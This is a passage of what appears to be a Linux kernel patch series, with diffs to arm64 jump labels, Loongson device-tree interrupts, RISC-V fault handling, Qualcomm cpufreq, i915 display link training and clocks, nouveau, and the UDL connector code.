++#define HAVE_JUMP_LABEL_BATCH
+ #define JUMP_LABEL_NOP_SIZE		AARCH64_INSN_SIZE
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key,
+diff --git a/arch/arm64/kernel/jump_label.c b/arch/arm64/kernel/jump_label.c
+index faf88ec9c48e8..f63ea915d6ad2 100644
+--- a/arch/arm64/kernel/jump_label.c
++++ b/arch/arm64/kernel/jump_label.c
+@@ -7,11 +7,12 @@
+  */
+ #include <linux/kernel.h>
+ #include <linux/jump_label.h>
++#include <linux/smp.h>
+ #include <asm/insn.h>
+ #include <asm/patching.h>
+ 
+-void arch_jump_label_transform(struct jump_entry *entry,
+-			       enum jump_label_type type)
++bool arch_jump_label_transform_queue(struct jump_entry *entry,
++				     enum jump_label_type type)
+ {
+ 	void *addr = (void *)jump_entry_code(entry);
+ 	u32 insn;
+@@ -25,4 +26,10 @@ void arch_jump_label_transform(struct jump_entry *entry,
+ 	}
+ 
+ 	aarch64_insn_patch_text_nosync(addr, insn);
++	return true;
++}
++
++void arch_jump_label_transform_apply(void)
++{
++	kick_all_cpus_sync();
+ }
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index 9089d1e4f3fee..cc7747c5f21f3 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -96,12 +96,19 @@ liointc1: interrupt-controller@1fe11440 {
+ 						<0x00000000>; /* int3 */
+ 		};
+ 
++		rtc0: rtc@1fe07800 {
++			compatible = "loongson,ls2k1000-rtc";
++			reg = <0 0x1fe07800 0 0x78>;
++			interrupt-parent = <&liointc1>;
++			interrupts = <8 IRQ_TYPE_LEVEL_HIGH>;
++		};
++
+ 		uart0: serial@1fe00000 {
+ 			compatible = "ns16550a";
+ 			reg = <0 0x1fe00000 0 0x8>;
+ 			clock-frequency = <125000000>;
+ 			interrupt-parent = <&liointc0>;
+-			interrupts = <0 IRQ_TYPE_LEVEL_LOW>;
++			interrupts = <0 IRQ_TYPE_LEVEL_HIGH>;
+ 			no-loopback-test;
+ 		};
+ 
+@@ -110,7 +117,6 @@ pci@1a000000 {
+ 			device_type = "pci";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			#interrupt-cells = <2>;
+ 
+ 			reg = <0 0x1a000000 0 0x02000000>,
+ 				<0xfe 0x00000000 0 0x20000000>;
+@@ -125,8 +131,8 @@ gmac@3,0 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+-				interrupts = <12 IRQ_TYPE_LEVEL_LOW>,
+-					     <13 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <12 IRQ_TYPE_LEVEL_HIGH>,
++					     <13 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+ 				phy-mode = "rgmii-id";
+@@ -149,8 +155,8 @@ gmac@3,1 {
+ 						   "loongson, pci-gmac";
+ 
+ 				reg = <0x1900 0x0 0x0 0x0 0x0>;
+-				interrupts = <14 IRQ_TYPE_LEVEL_LOW>,
+-					     <15 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <14 IRQ_TYPE_LEVEL_HIGH>,
++					     <15 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+ 				phy-mode = "rgmii-id";
+@@ -172,7 +178,7 @@ ehci@4,1 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x2100 0x0 0x0 0x0 0x0>;
+-				interrupts = <18 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <18 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 			};
+ 
+@@ -183,7 +189,7 @@ ohci@4,2 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x2200 0x0 0x0 0x0 0x0>;
+-				interrupts = <19 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <19 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 			};
+ 
+@@ -194,97 +200,121 @@ sata@8,0 {
+ 						   "pciclass0106";
+ 
+ 				reg = <0x4000 0x0 0x0 0x0 0x0>;
+-				interrupts = <19 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <19 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc0>;
+ 			};
+ 
+-			pci_bridge@9,0 {
++			pcie@9,0 {
+ 				compatible = "pci0014,7a19.0",
+ 						   "pci0014,7a19",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x4800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <0 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <0 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 0 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 0 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@a,0 {
++			pcie@a,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x5000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <1 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <1 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 1 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 1 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@b,0 {
++			pcie@b,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x5800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <2 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <2 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 2 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 2 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@c,0 {
++			pcie@c,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x6000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <3 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <3 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 3 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 3 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@d,0 {
++			pcie@d,0 {
+ 				compatible = "pci0014,7a19.0",
+ 						   "pci0014,7a19",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x6800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <4 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <4 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 4 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 4 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@e,0 {
++			pcie@e,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x7000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <5 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <5 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 5 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 5 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index 274bc6dd839fa..05d7d36479648 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -60,26 +60,27 @@ static inline void no_context(struct pt_regs *regs, unsigned long addr)
+ 
+ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_fault_t fault)
+ {
++	if (!user_mode(regs)) {
++		no_context(regs, addr);
++		return;
++	}
++
+ 	if (fault & VM_FAULT_OOM) {
+ 		/*
+ 		 * We ran out of memory, call the OOM killer, and return the userspace
+ 		 * (which will retry the fault, or kill us if we got oom-killed).
+ 		 */
+-		if (!user_mode(regs)) {
+-			no_context(regs, addr);
+-			return;
+-		}
+ 		pagefault_out_of_memory();
+ 		return;
+ 	} else if (fault & VM_FAULT_SIGBUS) {
+ 		/* Kernel mode? Handle exceptions or die */
+-		if (!user_mode(regs)) {
+-			no_context(regs, addr);
+-			return;
+-		}
+ 		do_trap(regs, SIGBUS, BUS_ADRERR, addr);
+ 		return;
++	} else if (fault & VM_FAULT_SIGSEGV) {
++		do_trap(regs, SIGSEGV, SEGV_MAPERR, addr);
++		return;
+ 	}
++
+ 	BUG();
+ }
+ 
+diff --git a/drivers/cpufreq/qcom-cpufreq-nvmem.c b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+index cb03bfb0435ea..2edb66097cdb9 100644
+--- a/drivers/cpufreq/qcom-cpufreq-nvmem.c
++++ b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+@@ -53,10 +53,14 @@ struct qcom_cpufreq_match_data {
+ 	const char **genpd_names;
+ };
+ 
++struct qcom_cpufreq_drv_cpu {
++	int opp_token;
++};
++
+ struct qcom_cpufreq_drv {
+-	int *opp_tokens;
+ 	u32 versions;
+ 	const struct qcom_cpufreq_match_data *data;
++	struct qcom_cpufreq_drv_cpu cpus[];
+ };
+ 
+ static struct platform_device *cpufreq_dt_pdev, *cpufreq_pdev;
+@@ -284,42 +288,39 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	drv = kzalloc(sizeof(*drv), GFP_KERNEL);
+-	if (!drv)
++	drv = devm_kzalloc(&pdev->dev, struct_size(drv, cpus, num_possible_cpus()),
++		           GFP_KERNEL);
++	if (!drv) {
++		of_node_put(np);
+ 		return -ENOMEM;
++	}
+ 
+ 	match = pdev->dev.platform_data;
+ 	drv->data = match->data;
+ 	if (!drv->data) {
+-		ret = -ENODEV;
+-		goto free_drv;
++		of_node_put(np);
++		return -ENODEV;
+ 	}
+ 
+ 	if (drv->data->get_version) {
+ 		speedbin_nvmem = of_nvmem_cell_get(np, NULL);
+ 		if (IS_ERR(speedbin_nvmem)) {
+-			ret = dev_err_probe(cpu_dev, PTR_ERR(speedbin_nvmem),
+-					    "Could not get nvmem cell\n");
+-			goto free_drv;
++			of_node_put(np);
++			return dev_err_probe(cpu_dev, PTR_ERR(speedbin_nvmem),
++					     "Could not get nvmem cell\n");
+ 		}
+ 
+ 		ret = drv->data->get_version(cpu_dev,
+ 							speedbin_nvmem, &pvs_name, drv);
+ 		if (ret) {
++			of_node_put(np);
+ 			nvmem_cell_put(speedbin_nvmem);
+-			goto free_drv;
++			return ret;
+ 		}
+ 		nvmem_cell_put(speedbin_nvmem);
+ 	}
+ 	of_node_put(np);
+ 
+-	drv->opp_tokens = kcalloc(num_possible_cpus(), sizeof(*drv->opp_tokens),
+-				  GFP_KERNEL);
+-	if (!drv->opp_tokens) {
+-		ret = -ENOMEM;
+-		goto free_drv;
+-	}
+-
+ 	for_each_possible_cpu(cpu) {
+ 		struct dev_pm_opp_config config = {
+ 			.supported_hw = NULL,
+@@ -345,9 +346,9 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		if (config.supported_hw || config.genpd_names) {
+-			drv->opp_tokens[cpu] = dev_pm_opp_set_config(cpu_dev, &config);
+-			if (drv->opp_tokens[cpu] < 0) {
+-				ret = drv->opp_tokens[cpu];
++			drv->cpus[cpu].opp_token = dev_pm_opp_set_config(cpu_dev, &config);
++			if (drv->cpus[cpu].opp_token < 0) {
++				ret = drv->cpus[cpu].opp_token;
+ 				dev_err(cpu_dev, "Failed to set OPP config\n");
+ 				goto free_opp;
+ 			}
+@@ -366,15 +367,11 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 
+ free_opp:
+ 	for_each_possible_cpu(cpu)
+-		dev_pm_opp_clear_config(drv->opp_tokens[cpu]);
+-	kfree(drv->opp_tokens);
+-free_drv:
+-	kfree(drv);
+-
++		dev_pm_opp_clear_config(drv->cpus[cpu].opp_token);
+ 	return ret;
+ }
+ 
+-static int qcom_cpufreq_remove(struct platform_device *pdev)
++static void qcom_cpufreq_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_cpufreq_drv *drv = platform_get_drvdata(pdev);
+ 	unsigned int cpu;
+@@ -382,17 +379,12 @@ static int qcom_cpufreq_remove(struct platform_device *pdev)
+ 	platform_device_unregister(cpufreq_dt_pdev);
+ 
+ 	for_each_possible_cpu(cpu)
+-		dev_pm_opp_clear_config(drv->opp_tokens[cpu]);
+-
+-	kfree(drv->opp_tokens);
+-	kfree(drv);
+-
+-	return 0;
++		dev_pm_opp_clear_config(drv->cpus[cpu].opp_token);
+ }
+ 
+ static struct platform_driver qcom_cpufreq_driver = {
+ 	.probe = qcom_cpufreq_probe,
+-	.remove = qcom_cpufreq_remove,
++	.remove_new = qcom_cpufreq_remove,
+ 	.driver = {
+ 		.name = "qcom-cpufreq-nvmem",
+ 	},
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_link_training.c b/drivers/gpu/drm/i915/display/intel_dp_link_training.c
+index 3d3efcf02011e..1d9e4534287bb 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_link_training.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_link_training.c
+@@ -103,12 +103,26 @@ intel_dp_set_lttpr_transparent_mode(struct intel_dp *intel_dp, bool enable)
+ 	return drm_dp_dpcd_write(&intel_dp->aux, DP_PHY_REPEATER_MODE, &val, 1) == 1;
+ }
+ 
+-static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
++static bool intel_dp_lttpr_transparent_mode_enabled(struct intel_dp *intel_dp)
++{
++	return intel_dp->lttpr_common_caps[DP_PHY_REPEATER_MODE -
++					   DP_LT_TUNABLE_PHY_REPEATER_FIELD_DATA_STRUCTURE_REV] ==
++		DP_PHY_REPEATER_MODE_TRANSPARENT;
++}
++
++/*
++ * Read the LTTPR common capabilities and switch the LTTPR PHYs to
++ * non-transparent mode if this is supported. Preserve the
++ * transparent/non-transparent mode on an active link.
++ *
++ * Return the number of detected LTTPRs in non-transparent mode or 0 if the
++ * LTTPRs are in transparent mode or the detection failed.
++ */
++static int intel_dp_init_lttpr_phys(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
+ {
+ 	struct intel_encoder *encoder = &dp_to_dig_port(intel_dp)->base;
+ 	struct drm_i915_private *i915 = to_i915(encoder->base.dev);
+ 	int lttpr_count;
+-	int i;
+ 
+ 	if (!intel_dp_read_lttpr_common_caps(intel_dp, dpcd))
+ 		return 0;
+@@ -122,6 +136,19 @@ static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEI
+ 	if (lttpr_count == 0)
+ 		return 0;
+ 
++	/*
++	 * Don't change the mode on an active link, to prevent a loss of link
++	 * synchronization. See DP Standard v2.0 3.6.7. about the LTTPR
++	 * resetting its internal state when the mode is changed from
++	 * non-transparent to transparent.
++	 */
++	if (intel_dp->link_trained) {
++		if (lttpr_count < 0 || intel_dp_lttpr_transparent_mode_enabled(intel_dp))
++			goto out_reset_lttpr_count;
++
++		return lttpr_count;
++	}
++
+ 	/*
+ 	 * See DP Standard v2.0 3.6.6.1. about the explicit disabling of
+ 	 * non-transparent mode and the disable->enable non-transparent mode
+@@ -143,11 +170,25 @@ static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEI
+ 			    encoder->base.base.id, encoder->base.name);
+ 
+ 		intel_dp_set_lttpr_transparent_mode(intel_dp, true);
+-		intel_dp_reset_lttpr_count(intel_dp);
+ 
+-		return 0;
++		goto out_reset_lttpr_count;
+ 	}
+ 
++	return lttpr_count;
++
++out_reset_lttpr_count:
++	intel_dp_reset_lttpr_count(intel_dp);
++
++	return 0;
++}
++
++static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
++{
++	int lttpr_count;
++	int i;
++
++	lttpr_count = intel_dp_init_lttpr_phys(intel_dp, dpcd);
++
+ 	for (i = 0; i < lttpr_count; i++)
+ 		intel_dp_read_lttpr_phy_caps(intel_dp, dpcd, DP_PHY_LTTPR(i));
+ 
+@@ -1435,8 +1476,9 @@ void intel_dp_start_link_train(struct intel_dp *intel_dp,
+ {
+ 	bool passed;
+ 	/*
+-	 * TODO: Reiniting LTTPRs here won't be needed once proper connector
+-	 * HW state readout is added.
++	 * Reinit the LTTPRs here to ensure that they are switched to
++	 * non-transparent mode. During an earlier LTTPR detection this
++	 * could've been prevented by an active link.
+ 	 */
+ 	int lttpr_count = intel_dp_init_lttpr_and_dprx_caps(intel_dp);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dpll_mgr.c b/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
+index 64dd603dc69aa..ec0ef3ff9e6ab 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
++++ b/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
+@@ -1552,7 +1552,7 @@ static void skl_wrpll_params_populate(struct skl_wrpll_params *params,
+ }
+ 
+ static int
+-skl_ddi_calculate_wrpll(int clock /* in Hz */,
++skl_ddi_calculate_wrpll(int clock,
+ 			int ref_clock,
+ 			struct skl_wrpll_params *wrpll_params)
+ {
+@@ -1577,7 +1577,7 @@ skl_ddi_calculate_wrpll(int clock /* in Hz */,
+ 	};
+ 	unsigned int dco, d, i;
+ 	unsigned int p0, p1, p2;
+-	u64 afe_clock = clock * 5; /* AFE Clock is 5x Pixel clock */
++	u64 afe_clock = (u64)clock * 1000 * 5; /* AFE Clock is 5x Pixel clock, in Hz */
+ 
+ 	for (d = 0; d < ARRAY_SIZE(dividers); d++) {
+ 		for (dco = 0; dco < ARRAY_SIZE(dco_central_freq); dco++) {
+@@ -1709,7 +1709,7 @@ static int skl_ddi_hdmi_pll_dividers(struct intel_crtc_state *crtc_state)
+ 
+ 	ctrl1 |= DPLL_CTRL1_HDMI_MODE(0);
+ 
+-	ret = skl_ddi_calculate_wrpll(crtc_state->port_clock * 1000,
++	ret = skl_ddi_calculate_wrpll(crtc_state->port_clock,
+ 				      i915->display.dpll.ref_clks.nssc, &wrpll_params);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_hdcp_regs.h b/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
+index 2a3733e8966c1..2702cc8c88d8d 100644
+--- a/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
++++ b/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
+@@ -249,7 +249,7 @@
+ #define HDCP2_STREAM_STATUS(dev_priv, trans, port) \
+ 					(GRAPHICS_VER(dev_priv) >= 12 ? \
+ 					 TRANS_HDCP2_STREAM_STATUS(trans) : \
+-					 PIPE_HDCP2_STREAM_STATUS(pipe))
++					 PIPE_HDCP2_STREAM_STATUS(port))
+ 
+ #define _PORTA_HDCP2_AUTH_STREAM		0x66F00
+ #define _PORTB_HDCP2_AUTH_STREAM		0x66F04
+diff --git a/drivers/gpu/drm/nouveau/nouveau_prime.c b/drivers/gpu/drm/nouveau/nouveau_prime.c
+index 9608121e49b7e..8340d55aaa987 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_prime.c
++++ b/drivers/gpu/drm/nouveau/nouveau_prime.c
+@@ -63,7 +63,8 @@ struct drm_gem_object *nouveau_gem_prime_import_sg_table(struct drm_device *dev,
+ 	 * to the caller, instead of a normal nouveau_bo ttm reference. */
+ 	ret = drm_gem_object_init(dev, &nvbo->bo.base, size);
+ 	if (ret) {
+-		nouveau_bo_ref(NULL, &nvbo);
++		drm_gem_object_release(&nvbo->bo.base);
++		kfree(nvbo);
+ 		obj = ERR_PTR(-ENOMEM);
+ 		goto unlock;
+ 	}
+diff --git a/drivers/gpu/drm/udl/Makefile b/drivers/gpu/drm/udl/Makefile
+index 24d61f61d7db2..3f6db179455d1 100644
+--- a/drivers/gpu/drm/udl/Makefile
++++ b/drivers/gpu/drm/udl/Makefile
+@@ -1,4 +1,4 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-udl-y := udl_drv.o udl_modeset.o udl_connector.o udl_main.o udl_transfer.o
++udl-y := udl_drv.o udl_modeset.o udl_main.o udl_transfer.o
+ 
+ obj-$(CONFIG_DRM_UDL) := udl.o
+diff --git a/drivers/gpu/drm/udl/udl_connector.c b/drivers/gpu/drm/udl/udl_connector.c
+deleted file mode 100644
+index fade4c7adbf78..0000000000000
+--- a/drivers/gpu/drm/udl/udl_connector.c
++++ /dev/null
+@@ -1,139 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * Copyright (C) 2012 Red Hat
+- * based in parts on udlfb.c:
+- * Copyright (C) 2009 Roberto De Ioris <roberto@unbit.it>
+- * Copyright (C) 2009 Jaya Kumar <jayakumar.lkml@gmail.com>
+- * Copyright (C) 2009 Bernie Thompson <bernie@plugable.com>
+- */
+-
+-#include <drm/drm_atomic_state_helper.h>
+-#include <drm/drm_edid.h>
+-#include <drm/drm_crtc_helper.h>
+-#include <drm/drm_probe_helper.h>
+-
+-#include "udl_connector.h"
+-#include "udl_drv.h"
+-
+-static int udl_get_edid_block(void *data, u8 *buf, unsigned int block,
+-			       size_t len)
+-{
+-	int ret, i;
+-	u8 *read_buff;
+-	struct udl_device *udl = data;
+-	struct usb_device *udev = udl_to_usb_device(udl);
+-
+-	read_buff = kmalloc(2, GFP_KERNEL);
+-	if (!read_buff)
+-		return -1;
+-
+-	for (i = 0; i < len; i++) {
+-		int bval = (i + block * EDID_LENGTH) << 8;
+-		ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
+-				      0x02, (0x80 | (0x02 << 5)), bval,
+-				      0xA1, read_buff, 2, 1000);
+-		if (ret < 1) {
+-			DRM_ERROR("Read EDID byte %d failed err %x\n", i, ret);
+-			kfree(read_buff);
+-			return -1;
+-		}
+-		buf[i] = read_buff[1];
+-	}
+-
+-	kfree(read_buff);
+-	return 0;
+-}
+-
+-static int udl_get_modes(struct drm_connector *connector)
+-{
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	drm_connector_update_edid_property(connector, udl_connector->edid);
+-	if (udl_connector->edid)
+-		return drm_add_edid_modes(connector, udl_connector->edid);
+-	return 0;
+-}
+-
+-static enum drm_mode_status udl_mode_valid(struct drm_connector *connector,
+-			  struct drm_display_mode *mode)
+-{
+-	struct udl_device *udl = to_udl(connector->dev);
+-	if (!udl->sku_pixel_limit)
+-		return 0;
+-
+-	if (mode->vdisplay * mode->hdisplay > udl->sku_pixel_limit)
+-		return MODE_VIRTUAL_Y;
+-
+-	return 0;
+-}
+-
+-static enum drm_connector_status
+-udl_detect(struct drm_connector *connector, bool force)
+-{
+-	struct udl_device *udl = to_udl(connector->dev);
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	/* cleanup previous edid */
+-	if (udl_connector->edid != NULL) {
+-		kfree(udl_connector->edid);
+-		udl_connector->edid = NULL;
+-	}
+-
+-	udl_connector->edid = drm_do_get_edid(connector, udl_get_edid_block, udl);
+-	if (!udl_connector->edid)
+-		return connector_status_disconnected;
+-
+-	return connector_status_connected;
+-}
+-
+-static void udl_connector_destroy(struct drm_connector *connector)
+-{
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	drm_connector_cleanup(connector);
+-	kfree(udl_connector->edid);
+-	kfree(connector);
+-}
+-
+-static const struct drm_connector_helper_funcs udl_connector_helper_funcs = {
+-	.get_modes = udl_get_modes,
+-	.mode_valid = udl_mode_valid,
+-};
+-
+-static const struct drm_connector_funcs udl_connector_funcs = {
+-	.reset = drm_atomic_helper_connector_reset,
+-	.detect = udl_detect,
+-	.fill_modes = drm_helper_probe_single_connector_modes,
+-	.destroy = udl_connector_destroy,
+-	.atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state,
+-	.atomic_destroy_state   = drm_atomic_helper_connector_destroy_state,
+-};
+-
+-struct drm_connector *udl_connector_init(struct drm_device *dev)
+-{
+-	struct udl_drm_connector *udl_connector;
+-	struct drm_connector *connector;
+-
+-	udl_connector = kzalloc(sizeof(struct udl_drm_connector), GFP_KERNEL);
+-	if (!udl_connector)
+-		return ERR_PTR(-ENOMEM);
+-
+-	connector = &udl_connector->connector;
+-	drm_connector_init(dev, connector, &udl_connector_funcs,
+-			   DRM_MODE_CONNECTOR_VGA);
+-	drm_connector_helper_add(connector, &udl_connector_helper_funcs);
+-
+-	connector->polled = DRM_CONNECTOR_POLL_HPD |
+-		DRM_CONNECTOR_POLL_CONNECT | DRM_CONNECTOR_POLL_DISCONNECT;
+-
+-	return connector;
+-}
+diff --git a/drivers/gpu/drm/udl/udl_connector.h b/drivers/gpu/drm/udl/udl_connector.h
+deleted file mode 100644
+index 7f2d392df1737..0000000000000
+--- a/drivers/gpu/drm/udl/udl_connector.h
++++ /dev/null
+@@ -1,15 +0,0 @@
+-#ifndef __UDL_CONNECTOR_H__
+-#define __UDL_CONNECTOR_H__
+-
+-#include <drm/drm_crtc.h>
+-
+-struct edid;
+-
+-struct udl_drm_connector {
+-	struct drm_connector connector;
+-	/* last udl_detect edid */
+-	struct edid *edid;
+-};
+-
+-
+-#endif //__UDL_CONNECTOR_H__
+diff --git a/drivers/gpu/drm/udl/udl_drv.h b/drivers/gpu/drm/udl/udl_drv.h
+index b4cc7cc568c74..d7a3d495f2e7e 100644
+--- a/drivers/gpu/drm/udl/udl_drv.h
++++ b/drivers/gpu/drm/udl/udl_drv.h
+@@ -46,6 +46,17 @@ struct urb_list {
+ 	size_t size;
+ };
+ 
++struct udl_connector {
++	struct drm_connector connector;
++	/* last udl_detect edid */
++	struct edid *edid;
++};
++
++static inline struct udl_connector *to_udl_connector(struct drm_connector *connector)
++{
++	return container_of(connector, struct udl_connector, connector);
++}
++
+ struct udl_device {
+ 	struct drm_device drm;
+ 	struct device *dev;
+diff --git a/drivers/gpu/drm/udl/udl_modeset.c b/drivers/gpu/drm/udl/udl_modeset.c
+index ec6876f449f31..8f4c4a857b6e8 100644
+--- a/drivers/gpu/drm/udl/udl_modeset.c
++++ b/drivers/gpu/drm/udl/udl_modeset.c
+@@ -11,11 +11,13 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_crtc_helper.h>
+ #include <drm/drm_damage_helper.h>
++#include <drm/drm_edid.h>
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_gem_atomic_helper.h>
+ #include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_gem_shmem_helper.h>
+ #include <drm/drm_modeset_helper_vtables.h>
++#include <drm/drm_probe_helper.h>
+ #include <drm/drm_vblank.h>
+ 
+ #include "udl_drv.h"
+@@ -403,12 +405,145 @@ static const struct drm_simple_display_pipe_funcs udl_simple_display_pipe_funcs
+ 	DRM_GEM_SIMPLE_DISPLAY_PIPE_SHADOW_PLANE_FUNCS,
+ };
+ 
++/*
++ * Connector
++ */
++
++static int udl_connector_helper_get_modes(struct drm_connector *connector)
++{
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	drm_connector_update_edid_property(connector, udl_connector->edid);
++	if (udl_connector->edid)
++		return drm_add_edid_modes(connector, udl_connector->edid);
++
++	return 0;
++}
++
